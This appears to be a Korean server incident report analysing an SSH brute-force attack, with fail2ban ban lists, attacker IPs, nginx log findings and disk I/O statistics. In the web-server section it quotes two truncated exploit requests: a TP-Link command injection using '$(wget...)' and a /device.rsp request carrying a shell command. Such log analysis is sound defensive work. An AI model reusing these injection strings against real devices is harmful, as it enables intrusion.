1. 개요

  2025년 12월 16일 22:00 전후 시간대의 시스템 활동을 분석한 결과, 대규모 SSH 브루트포스 공격이 발생했습니다.

  2. 주요 발견 사항

  2.1 SSH 브루트포스 공격 (주요 원인)

  통계:
  - 262개의 SSH 인증 시도 (auth.log)
  - 115개의 fail2ban 이벤트 기록
  - 33개의 IP 차단/해제 (Ban/Unban) 작업

  가장 활발했던 공격 IP:
  - 62.60.131.157 (4회 실패)
  - 122.53.133.167 (3회 실패)
  - 202.125.94.71, 182.93.7.194, 175.0.65.39, 162.19.224.161 등 (각 2회 실패)

  공격 패턴:
  - Invalid user 타겟: admin, avahi, db, hyliu, baran, ghost, ubuntu, reese, dylan, zimbra, asw, mohit, sol, deploy, abc, es, asmon
  - root 계정 직접 공격 다수
  - 여러 IP에서 동시다발적 공격

  fail2ban에 의해 차단된 IP (22:00대):
  202.4.106.201, 202.125.94.71, 182.93.7.194, 62.60.131.157,
  162.19.224.161, 27.128.160.208, 217.154.106.153, 175.0.65.39,
  59.42.251.44, 45.78.220.1, 193.46.255.217, 72.56.87.83,
  122.53.133.167, 103.51.216.210

  2.2 웹 서버 활동

  Nginx 접근 로그:
  - 22:00대 총 26개 요청 (정상 수준)

  의심스러운 요청:
  - 221.159.119.6: TP-Link 라우터 exploit 시도
  /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget...)
  - 45.156.87.82: 악성 스크립트 다운로드 시도
  POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%20...

  2.3 디스크 I/O 통계 (sar 데이터)

  12월 16일 21:30-22:30 디스크 쓰기:
  | 시간        | 쓰기량 (kB/s) | 트랜잭션/초 |
  |-------------|---------------|-------------|
  | 21:30-21:40 | 21.55         | 2.05        |
  | 21:40-21:50 | 38.93         | 3.82        |
  | 21:50-22:00 | 13.40         | 1.27        |
  | 22:00-22:10 | 33.26         | 3.24        |
  | 22:10-22:20 | 23.85         | 2.31        |

  평균: 26.19 kB/s (약 1.5 MB/분)